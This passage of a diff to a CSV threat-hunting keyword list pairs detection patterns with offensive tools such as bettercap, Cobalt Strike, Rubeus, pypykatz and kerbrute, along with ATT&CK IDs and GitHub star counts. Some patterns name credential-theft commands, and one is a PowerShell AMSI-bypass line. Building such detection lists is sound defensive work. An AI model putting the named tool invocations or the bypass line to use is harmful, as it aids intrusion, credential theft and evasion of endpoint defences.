TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*arpspoof -i *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" -"*ArpSpoofer*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" 
+"*arp.spoof.targets*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp_mitm.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*arp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arpspoof -i *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*ArpSpoofer*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*arpspoofing.py *","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","0","N/A","N/A","1","15","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" "*arsenal_kit.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" 
@@ -7317,42 +7462,42 @@ "*artifact64svcbig.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifactbig64.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifactuac*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*aruba2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*aruba2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*AS 'Login that can be impersonated'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*as 'Owner that can be impersonated'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*ASBBypass.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - 
TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ASBBypass.ps1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*ASBBypass.ps1*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*ASRenum-BOF.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" -"*asrep_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*asrep2kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*asreprc4_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*asreproast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Asreproast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*asrep_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asrep2kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*asreprc4_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asreproast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Asreproast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*ASREPRoast.ps1*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*asreproast_*.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*asreproast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*asreproast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*ASreproasting.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*ASRepToHashcat*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*Assemblies/SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*asreproast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asreproast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ASreproasting.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*ASRepToHashcat*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" 
+"*Assemblies/SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*assembly *.asm *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*assembly *.exe *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assembly_inject -*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*--assemblyargs AntiVirus AppLocker*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*--assemblyargs AntiVirus AppLocker*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*Assets/solution/dllmain.cpp*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "*AssmblyLoader*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*AsStrongAsFuck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*AsStrongAsFuck.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*async_webshell-all.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 
